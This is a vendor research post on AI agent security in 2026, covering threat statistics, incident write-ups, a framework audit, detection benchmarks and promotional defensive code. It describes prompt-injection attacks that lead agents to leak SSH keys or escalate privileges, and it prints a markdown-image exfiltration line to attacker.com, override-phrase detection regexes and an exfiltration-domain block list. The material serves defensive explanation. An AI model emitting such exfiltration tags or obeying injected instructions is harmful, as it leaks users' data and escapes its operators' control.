Research · March 2026 · 18 min read

The State of AI Agent Security in 2026

AI agents went from demos to production in 2025. In 2026, they are everywhere — writing code, managing infrastructure, processing financial transactions, and handling customer data at scale. The security story has not kept up. This is a data-driven analysis of where we stand: what's attacking agents in production, which defenses work, and what the rest of 2026 looks like.

The numbers: AI agent adoption and risk

The scale of AI agent deployment in 2026 is unprecedented. According to Gartner's February 2026 forecast, 35% of enterprise software interactions will involve an AI agent by end of year — up from under 5% in 2024. McKinsey's State of AI report estimates that 72% of organizations are now running at least one autonomous agent in production, though fewer than 20% have formal security controls around them.

72% of organizations running production AI agents (McKinsey State of AI, Jan 2026)

14% of agent sessions contain injection attempts (Rune production monitoring data)

$4.2B estimated 2026 losses from AI-related security incidents (IBM Cost of a Data Breach 2026, projected)

What makes these numbers alarming is the gap between adoption and security maturity. The OWASP Foundation published its Top 10 for LLM Applications v2.0 in late 2025, and their assessment was blunt: fewer than 15% of production agent deployments have adequate runtime security controls. Most teams ship agents with the same security posture as a prototype — open tool access, no input scanning, raw conversation logs containing PII.

From our own monitoring data across production deployments: 73% of agents have access to tools they never use, 41% have no input scanning of any kind, and 68% log raw conversation data including PII without redaction. These are not theoretical risks. They are the current state of production agent security.
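The least-privilege gap is straightforward to measure. As a sketch (function and tool names are hypothetical), compare the tool list in an agent's configuration against the tools it actually invokes in production traces:

```python
from collections import Counter

def audit_tool_usage(granted_tools, invocation_log):
    """Compare the tools an agent is granted against those it actually calls.

    granted_tools: tool names from the agent's config
    invocation_log: tool names observed in production traces
    """
    used = Counter(invocation_log)
    unused = sorted(set(granted_tools) - set(used))
    return {
        "granted": len(granted_tools),
        "used": len(used),
        "unused": unused,  # candidates for removal under least privilege
    }

report = audit_tool_usage(
    granted_tools=["search_kb", "get_order", "delete_user", "run_sql"],
    invocation_log=["search_kb", "get_order", "search_kb"],
)
```

Running this audit periodically and revoking the `unused` list is the cheapest security win available: it shrinks the blast radius of any successful injection without touching the agent's behavior.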

The 2026 threat landscape: what's actually attacking agents

The attack surface for AI agents is broader than most teams realize. Unlike traditional web applications where the attack surface is the HTTP request, an agent's attack surface is its entire context window — every user message, tool output, retrieved document, and API response that flows into the LLM. Here is what we see in production, ranked by prevalence.

Attack prevalence in monitored agent sessions (Q1 2026)

14% (Critical): Indirect prompt injection
Malicious instructions embedded in retrieved data (web pages, documents, emails, database records). The attacker never directly interacts with the agent.

11% (High): System prompt extraction
Attempts to reveal the agent's hidden instructions, often as reconnaissance for more targeted attacks.

9% (Critical): Data exfiltration
Manipulating the agent into sending sensitive data to attacker-controlled endpoints via tool calls, markdown images, or encoded URLs.

8% (High): PII exposure (non-malicious)
Agents surfacing Social Security numbers, credit cards, and personal data from databases or documents without any attack -- just overly permissive access.

6% (Critical): Secret/credential leaking
API keys, tokens, and database credentials appearing in agent outputs. Often caused by agents reading environment variables or config files.

5% (High): Privilege escalation
Agents accessing tools or performing actions beyond their intended scope, typically through mode escalation prompts or multi-step manipulation.

3% (Critical): Command injection
Injecting OS commands or code execution through agents with shell or eval access. Lower prevalence but highest blast radius.

The most important trend in 2026 is the shift from direct to indirect prompt injection. In 2024, most injection attempts were users typing "ignore your instructions" directly into the chat. In 2026, the majority of injections arrive through data the agent retrieves — a poisoned web page, a malicious email in the inbox, a compromised API response. The attacker never touches the agent directly. This makes detection significantly harder because the malicious payload enters through trusted data channels.
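One practical mitigation is to treat every retrieved document as untrusted and scan it before it enters the context window. A minimal sketch, assuming a small illustrative pattern list (production scanners use far larger, validated rule sets):

```python
import re

# A few illustrative patterns for instruction-like text inside retrieved data.
# These are assumptions for the sketch, not a complete detection set.
INJECTION_PATTERNS = [
    re.compile(r"ignore (all )?(previous|prior|above) instructions", re.I),
    re.compile(r"you are now\b", re.I),
    re.compile(r"system prompt", re.I),
]

def scan_retrieved(text: str) -> bool:
    """Return True if retrieved content looks like an injection attempt."""
    return any(p.search(text) for p in INJECTION_PATTERNS)

def add_to_context(context: list, doc: str) -> None:
    # Treat retrieved data as untrusted: scan before it enters the window.
    if scan_retrieved(doc):
        context.append("[document withheld: possible prompt injection]")
    else:
        context.append(doc)
```

The key design choice is where the scan runs: at retrieval time, before the content is concatenated into the prompt, rather than on the user's message alone.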

Real incidents: what went wrong in production

Security research papers are useful, but production incidents tell the real story. Here are documented cases from 2025–2026 that illustrate the attack patterns teams face today.

Indirect injection · 2025

The Markdown Image Exfiltration Attack

Security researcher Johann Rehberger demonstrated a technique where a prompt injection in a retrieved document caused an AI assistant to render a markdown image tag: ![](https://attacker.com/exfil?data=SECRET). When the chat interface rendered the image, the browser made a GET request to the attacker's server with the stolen data encoded in the URL. This worked against multiple major AI assistants and required no user interaction beyond reading the response. The attack is particularly dangerous because it is invisible — the user sees a broken image or nothing at all.
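The defense is to sanitize markdown before the chat interface renders it: strip or neutralize image URLs pointing outside an allowlist, so the browser never issues the exfiltration request. A minimal sketch (the allowlist host is hypothetical):

```python
import re
from urllib.parse import urlparse

# Matches markdown image syntax with an absolute http(s) URL.
MD_IMAGE = re.compile(r"!\[[^\]]*\]\((https?://[^)\s]+)\)")

ALLOWED_IMAGE_HOSTS = {"cdn.example.com"}  # hypothetical allowlist

def strip_untrusted_images(markdown: str) -> str:
    """Remove markdown images pointing at hosts outside the allowlist,
    defusing zero-click exfiltration via image GET requests."""
    def repl(match):
        host = urlparse(match.group(1)).hostname or ""
        return match.group(0) if host in ALLOWED_IMAGE_HOSTS else "[image removed]"
    return MD_IMAGE.sub(repl, markdown)
```

This belongs in the rendering layer, not the model: even a perfectly aligned model can be tricked into emitting the tag, but a renderer that refuses to fetch untrusted hosts makes the tag inert.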

Tool abuse · 2025

Autonomous Coding Agents and Supply Chain Attacks

Multiple research teams demonstrated that AI coding assistants with terminal access could be manipulated through poisoned repository README files and package descriptions. The injected instructions caused the agent to install malicious npm packages, modify .bashrc files, and exfiltrate SSH keys — all while appearing to perform legitimate development tasks. The attack surface expanded further with MCP (Model Context Protocol), where a compromised MCP server could inject instructions into any agent that connected to it.

Data leak · 2025–2026

Customer Service Bot PII Exposure

A pattern we see repeatedly across deployments: customer-facing agents with database access surface PII from adjacent records. A user asks about their order, and the agent's SQL query returns more columns than needed — including other customers' names, emails, and phone numbers. The agent dutifully includes this data in its response. No injection required. The cause is almost always overly permissive database queries combined with no output scanning. This is the most common "incident" we see, and it happens without any attacker involvement.
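The fix is structural rather than model-level: give the lookup tool an explicit column allowlist and scope every query to the authenticated user. A sketch using SQLite (table and column names are illustrative):

```python
import sqlite3

# Only the columns the agent needs -- no names, emails, or phone numbers.
SAFE_COLUMNS = ("order_id", "status", "shipped_at")

def get_order_status(conn: sqlite3.Connection, user_id: int, order_id: int):
    """Order-lookup tool with an explicit column allowlist and row scoping.

    SAFE_COLUMNS is a fixed tuple defined above, never user input, so the
    f-string is safe; the values themselves go through parameter binding.
    """
    cur = conn.execute(
        f"SELECT {', '.join(SAFE_COLUMNS)} FROM orders "
        "WHERE user_id = ? AND order_id = ?",
        (user_id, order_id),
    )
    row = cur.fetchone()
    return dict(zip(SAFE_COLUMNS, row)) if row else None
```

With this shape, the adjacent-record leak described above cannot happen regardless of what the model generates: the tool is physically unable to return another customer's row or a sensitive column.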

Multi-agent chain · 2026

Agent-to-Agent Privilege Escalation

As multi-agent architectures became common in early 2026, a new attack pattern emerged: an attacker injects instructions into a low-privilege agent (e.g., a document summarizer) that get passed through to a high-privilege agent (e.g., a database administrator) in the chain. Each agent individually passes its authorization checks, but the attacker's payload survives the handoff because most frameworks pass full conversation context between agents without sanitization. We documented this pattern across LangGraph, CrewAI, and custom multi-agent deployments.
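The mitigation is to sanitize context at each trust boundary instead of forwarding the full conversation. A minimal sketch -- the specific policy shown here (drop upstream system messages, cap history, downgrade everything to untrusted user content) is one reasonable choice, not a standard:

```python
def sanitize_handoff(messages, max_turns=3):
    """Pass only recent, role-tagged content to the next agent.

    messages: list of {"role": ..., "content": ...} dicts from the
    upstream agent's conversation.
    """
    recent = messages[-max_turns:]
    cleaned = []
    for m in recent:
        if m["role"] == "system":
            continue  # the downstream agent keeps its own system prompt
        # Upstream output is untrusted input downstream, so everything
        # crosses the boundary as user content, never as instructions.
        cleaned.append({"role": "user", "content": m["content"]})
    return cleaned
```

The essential property is that no message from the low-privilege side can arrive at the high-privilege side carrying instruction-level authority.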

Framework security audit: who ships security built in?

We audited the major agent frameworks for built-in security capabilities as of March 2026. The short answer: none of them ship comprehensive runtime security. The long answer reveals meaningful differences in how far they go.

OpenAI Agents SDK

Input scanning: Basic (guardrails API)
Output scanning: Basic (guardrails API)
Policy engine: None
Tool restriction: Manual (developer-defined)

Best built-in security of any framework, but guardrails are simple input/output classifiers. No policy engine, no behavioral baselines, no multi-layer scanning.

LangChain / LangGraph

Input scanning: Optional (moderation chain)
Output scanning: Optional (moderation chain)
Policy engine: None
Tool restriction: Manual (tool binding)

Flexible but security is entirely opt-in. Moderation chain uses OpenAI's moderation endpoint -- catches toxicity, not injection. No injection detection out of the box.

Anthropic Claude Agent SDK

Input scanning: None (relies on model safety)
Output scanning: None (relies on model safety)
Policy engine: None
Tool restriction: Schema-based (tool definitions)

Claude's model-level safety training is strong, but there's no runtime scanning layer. Tool access is restricted by schema definitions, which is good but not enforceable against injection.

CrewAI

Input scanning: None
Output scanning: None
Policy engine: None
Tool restriction: Role-based (agent definitions)

Multi-agent orchestration with no security primitives. Role definitions are advisory -- the LLM can ignore them. No scanning, no policy enforcement.

AutoGen / AG2

Input scanning: None
Output scanning: None
Policy engine: None
Tool restriction: Manual

Research-oriented multi-agent framework. Security is not a design goal. Agents share full context by default with no sanitization between handoffs.

Vercel AI SDK

Input scanning: None (use middleware)
Output scanning: None (use middleware)
Policy engine: None
Tool restriction: Schema-based (inputSchema)

Excellent developer experience with type-safe tool definitions. Security is delegated to middleware and external tools. Tool schemas provide structural validation but no threat detection.

The takeaway: The industry is converging on a separation of concerns — agent frameworks handle orchestration, external security layers handle threat detection and policy enforcement. This is the right architecture. Framework-specific security creates vendor lock-in and inconsistent coverage. Runtime security that works across any framework gives teams consistent protection regardless of which orchestration layer they choose.

Detection benchmarks: how good are current tools?

Detection effectiveness varies dramatically by approach. We benchmarked four detection strategies against a dataset of 10,000 agent sessions — 2,400 containing confirmed attack payloads across all major threat categories, and 7,600 benign sessions with edge cases designed to trigger false positives.

Detection rate comparison (10K session benchmark)
Approach                    Detection   False Pos.   Latency (p50)
────────────────────────────────────────────────────────────────────
Regex only (L1)                 62%         0.8%          1.2ms
Semantic only (L2)              71%         3.1%          6.1ms
LLM classifier only (L3)       84%         1.9%        180ms
Multi-layer (L1+L2+L3)         96%         1.4%          8.2ms*

* p50 is low because L1 catches 62% of threats immediately.
  Only events that pass L1 go to L2, and only ambiguous L2
  results reach L3. Most events resolve in under 10ms.

The key insight is that no single layer is sufficient. Regex catches known patterns fast but misses rephrased attacks. Semantic similarity catches paraphrased attacks but has higher false positive rates. LLM judges are the most accurate but too slow and expensive for every request. The multi-layer approach uses each layer as a filter for the next — catching 62% of threats in under 2ms, another 25% in under 10ms, and only sending the remaining 13% to the LLM judge.

False positive rates matter as much as detection rates. A security tool that blocks legitimate requests is worse than one that misses occasional attacks, because it creates pressure to disable the tool entirely. The multi-layer approach achieves a 1.4% false positive rate by using L1's high-precision patterns as the primary filter and only escalating ambiguous cases.
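The cascade described above can be sketched in a few lines. The pattern list, the vocabulary heuristic standing in for embedding similarity, and the stubbed judge are all illustrative -- not Rune's actual rules:

```python
import re

# L1: fast, high-precision patterns (illustrative subset).
L1_PATTERNS = [re.compile(r"ignore (previous|all) instructions", re.I)]

def l1_pattern_scan(text):
    return any(p.search(text) for p in L1_PATTERNS)

def l2_semantic_scan(text):
    # Stand-in for cosine similarity against threat embeddings:
    # fraction of a small suspicious vocabulary present in the text.
    suspicious = {"disregard", "override", "jailbreak"}
    return sum(w in text.lower() for w in suspicious) / len(suspicious)

def l3_llm_judge(text):
    # Stub for an LLM classifier call on ambiguous events.
    return "pretend you are" in text.lower()

def scan(text, l2_threshold=0.5):
    if l1_pattern_scan(text):
        return "blocked:l1"          # resolved in ~1ms, no further work
    score = l2_semantic_scan(text)
    if score >= l2_threshold:
        return "blocked:l2"          # resolved in ~10ms
    if 0 < score < l2_threshold and l3_llm_judge(text):
        return "blocked:l3"          # only ambiguous events pay LLM latency
    return "allowed"
```

The latency numbers in the table fall out of this structure: most events terminate at L1 or L2, so the expensive judge only prices into the tail.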

What the benchmarks miss

Novel attacks: Any benchmark measures detection of known attack patterns. The real test is zero-day attacks that no one has seen before. This is where L3 (LLM judge) provides the most value — it can reason about whether an input is attempting to manipulate the agent even if the specific technique is new.

Multi-turn attacks: Most benchmarks evaluate single-turn detection. In production, sophisticated attackers spread their payload across multiple conversation turns, where each individual message looks benign. Session-level behavioral analysis is required to catch these, and very few tools offer it.
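Session-level analysis can be as simple as an exponentially decayed risk accumulator: each turn's score feeds a running total, so a payload spread across turns still trips a threshold even when no single turn does. A sketch (the scores and constants are arbitrary):

```python
class SessionMonitor:
    """Accumulate per-turn risk across a conversation.

    threshold: session risk at which to flag or block
    decay: weight applied to prior risk each turn (older turns matter less)
    """

    def __init__(self, threshold=1.0, decay=0.8):
        self.risk = 0.0
        self.threshold = threshold
        self.decay = decay

    def observe(self, turn_risk: float) -> bool:
        """Feed one turn's risk score; return True if the session trips."""
        self.risk = self.risk * self.decay + turn_risk
        return self.risk >= self.threshold

monitor = SessionMonitor()
# Three turns that each look marginal (0.45 risk) trip the session
# threshold together, even though none would trip it alone.
verdicts = [monitor.observe(0.45) for _ in range(3)]
```

The per-turn score would come from the single-turn scanners; the accumulator adds the temporal dimension those scanners lack.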

Accidental data leaks: The highest-volume security issue in production is not attacks at all — it is agents leaking PII, secrets, and internal data without any attacker involvement. Output scanning for sensitive data patterns is arguably more impactful than input scanning for injection attempts.
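Output scanning for accidental leaks is largely pattern matching against well-known sensitive-data shapes. A minimal sketch (production scanners use validated, much larger rule sets with checksums and context rules):

```python
import re

# Illustrative detectors for common sensitive-data shapes.
OUTPUT_PATTERNS = {
    "ssn": re.compile(r"\b\d{3}-\d{2}-\d{4}\b"),
    "credit_card": re.compile(r"\b(?:\d[ -]?){13,16}\b"),
    "api_key": re.compile(r"\b(?:sk|rk|ghp)_[A-Za-z0-9]{20,}\b"),
}

def scan_output(text: str) -> list:
    """Return the sensitive-data categories found in an agent response."""
    return [name for name, pat in OUTPUT_PATTERNS.items() if pat.search(text)]
```

Wired in just before the response leaves the system, this catches the no-attacker incidents described above -- the agent did nothing malicious, but the data still never reaches the user.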

The problem and solution in code

Most production agents today look something like this — a functional agent loop with zero security controls. Every input goes straight to the LLM, every output goes straight to the user, and every tool call executes without inspection.

The problem: a typical unprotected agent loop
from openai import OpenAI

client = OpenAI()

def run_agent(user_message: str) -> str:
    # No input scanning -- injection goes straight to the LLM
    response = client.chat.completions.create(
        model="gpt-4o",
        messages=[
            {"role": "system", "content": SYSTEM_PROMPT},
            {"role": "user", "content": user_message},  # untrusted
        ],
        tools=ALL_TOOLS,  # full tool access, no restrictions
    )

    # No output scanning -- PII, secrets, anything goes to the user
    return response.choices[0].message.content

This is the agent that 41% of production deployments are running today. Now here is the same agent with runtime security:

The solution: the same agent with Rune scanning
from openai import OpenAI
from rune import Shield

client = OpenAI()
shield = Shield()  # auto-configures from RUNE_API_KEY

def run_agent(user_message: str) -> str:
    # Scan input BEFORE it reaches the LLM
    input_result = shield.scan_input(user_message)
    if input_result.blocked:
        return f"Request blocked: {input_result.threat_type}"

    response = client.chat.completions.create(
        model="gpt-4o",
        messages=[
            {"role": "system", "content": SYSTEM_PROMPT},
            {"role": "user", "content": user_message},
        ],
        tools=ALLOWED_TOOLS,  # least privilege
    )

    output = response.choices[0].message.content

    # Scan output BEFORE it reaches the user
    output_result = shield.scan_output(output)
    if output_result.blocked:
        return "Response contained sensitive data and was blocked."

    return output

For teams using agent frameworks, Rune integrates natively without changing your agent logic:

Framework integrations: LangChain, OpenAI, and MCP
# LangChain -- drop-in callback
from rune.integrations.langchain import RuneCallbackHandler
chain.invoke({"input": msg}, config={"callbacks": [RuneCallbackHandler()]})

# OpenAI -- transparent wrapper
from rune.integrations.openai import shield_openai
client = shield_openai(OpenAI())  # all calls auto-scanned

# MCP -- security proxy for any MCP server
# pip install 'runesec[mcp]'
# RUNE_API_KEY=rune_live_xxx rune-mcp

And for teams that want policy enforcement without writing code, Rune's YAML policy engine restricts what agents can do at runtime:

YAML policy: restrict tools, block PII, deny exfiltration domains
version: "1.0"
rules:
  - name: block-injection
    scanner: prompt_injection
    action: block
    severity: critical

  - name: restrict-tools
    scanner: tool_access
    action: block
    config:
      allowed_tools:
        - search_knowledge_base
        - get_order_status
      # everything else is denied

  - name: block-pii-in-output
    scanner: pii
    action: block
    config:
      blocked_entities: [ssn, credit_card, api_key]

  - name: block-exfiltration
    scanner: exfiltration
    action: block
    config:
      blocked_domains: ["*.pastebin.com", "webhook.site", "*.ngrok.io"]

Predictions: the rest of 2026

Based on what we see in production data, customer conversations, and the trajectory of the threat landscape, here is what we expect for the rest of 2026.

1. Runtime security becomes a deployment requirement

Just as web application firewalls (WAFs) became a standard requirement for web apps, runtime agent security will become a deployment checklist item. We are already seeing this in regulated industries — financial services and healthcare teams are mandating agent scanning before production approval. By Q4 2026, we expect this to extend to any team handling customer data.

2. Agent identity and authorization standards emerge

Today, agents authenticate as the user who deployed them, with static API keys and overly broad permissions. In 2026, we expect agent-specific identity standards to emerge — likely extensions to OAuth 2.0 and OpenID Connect that support scoped, time-limited, and auditable agent credentials. The MCP specification is already moving in this direction with its authorization framework.
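To make the idea concrete, here is a sketch of a scoped, time-limited agent credential using an HMAC-signed token -- a stand-in for the OAuth-style extensions described above, not a proposed standard:

```python
import base64
import hashlib
import hmac
import json
import time

SECRET = b"server-side-signing-key"  # hypothetical; never shipped to agents

def issue_token(agent_id: str, scopes: list, ttl_s: int = 300) -> str:
    """Mint a short-lived credential naming the agent and its scopes."""
    claims = {"agent": agent_id, "scopes": scopes, "exp": time.time() + ttl_s}
    body = base64.urlsafe_b64encode(json.dumps(claims).encode())
    sig = hmac.new(SECRET, body, hashlib.sha256).hexdigest()
    return f"{body.decode()}.{sig}"

def authorize(token: str, required_scope: str) -> bool:
    """Check signature, expiry, and scope before allowing a tool call."""
    body, sig = token.rsplit(".", 1)
    expected = hmac.new(SECRET, body.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(sig, expected):
        return False  # tampered or forged token
    claims = json.loads(base64.urlsafe_b64decode(body))
    return time.time() < claims["exp"] and required_scope in claims["scopes"]
```

The properties that matter are exactly the ones static API keys lack: the credential names the agent (auditable), expires on its own (time-limited), and carries an explicit scope list (least privilege).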

3. Compliance frameworks add explicit agent requirements

SOC 2 auditors are already asking about AI agent controls (see our SOC 2 compliance guide). By end of 2026, we expect explicit agent-related criteria in SOC 2, ISO 27001, and HIPAA supplemental guidance. The EU AI Act already categorizes high-risk AI systems that require ongoing monitoring — agents with tool access in production fall squarely into this category.

4. Multi-agent security becomes the hard problem

Single-agent security is increasingly well understood. The frontier challenge is securing multi-agent systems where agents delegate to each other, share context, and make decisions collectively. Trust boundaries between agents, context sanitization in handoffs, and distributed authorization are unsolved problems that will dominate security research in late 2026.

5. Attackers will automate agent exploitation

Today, most agent attacks are manual — researchers and opportunistic attackers probing individual systems. We expect automated attack tools to emerge: crawlers that poison web pages with injection payloads targeting popular agent frameworks, automated MCP server compromise tools, and agent-specific vulnerability scanners. When attacking agents scales as easily as deploying them, the window for teams without security closes rapidly.

Where Rune fits in this landscape

We built Rune because we saw this problem first-hand. As AI agents proliferated in 2025, the security tooling available was either enterprise-only (requiring six-month procurement cycles), framework-specific (locking you into one vendor), or research-grade (not production-ready). None of it worked the way developers expected — drop it in, have it work, ship on Monday.

Rune is a runtime security layer that sits between your users and your agents. Three lines of code add a full scanning pipeline — 52 pattern-matching rules, 57 semantic embeddings, and an optional LLM judge. It works with any Python or TypeScript agent framework. Policies are defined in YAML, not code. Events stream to a real-time dashboard with alerting, risk scoring, and audit trails.

Critically, Rune runs in-process. Raw content never leaves your infrastructure by default. Only metadata (threat type, risk score, timestamps) goes to the dashboard for monitoring. This is a hard requirement for teams handling healthcare data, financial records, or anything governed by data residency regulations.

How Rune's scanning pipeline works
Event arrives (agent input or output)
  │
  ├─ L1 Pattern Scan (< 3ms)
  │    52 regex patterns: injection, PII, secrets, commands
  │    ├─ Match → block/flag immediately
  │    └─ No match → pass to L2
  │
  ├─ L2 Semantic Scan (5-10ms)
  │    57 threat embeddings, cosine similarity
  │    ├─ High similarity → block/flag
  │    └─ Low similarity → pass to L3 (sampled)
  │
  └─ L3 LLM Judge (100-500ms, optional)
       Claude or GPT classifies ambiguous events
       ├─ Malicious → block/flag
       └─ Benign → allow

Metadata only → Rune Dashboard (alerts, risk scores, audit trail)
Raw content stays in your infrastructure.

Frequently asked questions

What is the most common attack against AI agents in 2026?

Indirect prompt injection, appearing in approximately 14% of monitored agent sessions. Unlike direct injection where users type malicious prompts, indirect injection embeds attack payloads in data the agent retrieves -- web pages, documents, emails, and database records. This makes it harder to detect because the malicious content enters through trusted data channels.

Which AI agent frameworks have built-in security?

As of March 2026, no major agent framework ships comprehensive runtime security. OpenAI's Agents SDK has basic guardrails for input/output validation. LangChain has optional moderation chains. CrewAI, AutoGen, and most others delegate security entirely to the developer. The industry is converging on external runtime security layers that work across any framework.

How effective are current prompt injection detection tools?

In our 10K-session benchmark, single-layer detection (regex, semantic similarity, or an LLM classifier alone) catches 62-84% of attempts. The multi-layer approach combining all three achieves 96% detection with a 1.4% false positive rate. No single technique is sufficient -- attackers who evade one layer are caught by another.

What percentage of AI agents in production have security vulnerabilities?

Based on Rune's monitoring data: 73% of agents have access to tools they never use, 41% have no input scanning, and 68% log raw conversation data including PII without redaction. The OWASP Top 10 for LLM Applications estimates fewer than 15% of production deployments have adequate runtime security.

Is prompt injection a solved problem?

No. It's fundamentally unsolvable at the model level because LLMs cannot reliably distinguish instructions from data. However, it's manageable at the system level. Multi-layer scanning, least-privilege policies, output filtering, and behavioral monitoring together reduce practical risk to acceptable levels. Defense in depth, not a silver bullet.

What will AI agent security look like by end of 2026?

We expect three shifts: (1) Runtime security becomes a standard deployment requirement, like WAFs for web apps. (2) Agent identity and authorization standards emerge via OAuth/OIDC extensions. (3) Compliance frameworks (SOC 2, ISO 27001, HIPAA) add explicit requirements for AI agent monitoring and control.

How do I secure my AI agents today?

Start with three actions: (1) Add runtime scanning -- scan inputs for injection and outputs for data leaks. (2) Apply least-privilege policies -- restrict each agent to only the tools it needs. (3) Monitor behavior in production. Rune's free tier (10,000 events/month) lets you start immediately.

Secure your agents before the window closes

Three lines of code. Three scanning layers. Real-time dashboard, policy enforcement, and audit trails. Free plan includes 10K events/month — no credit card.
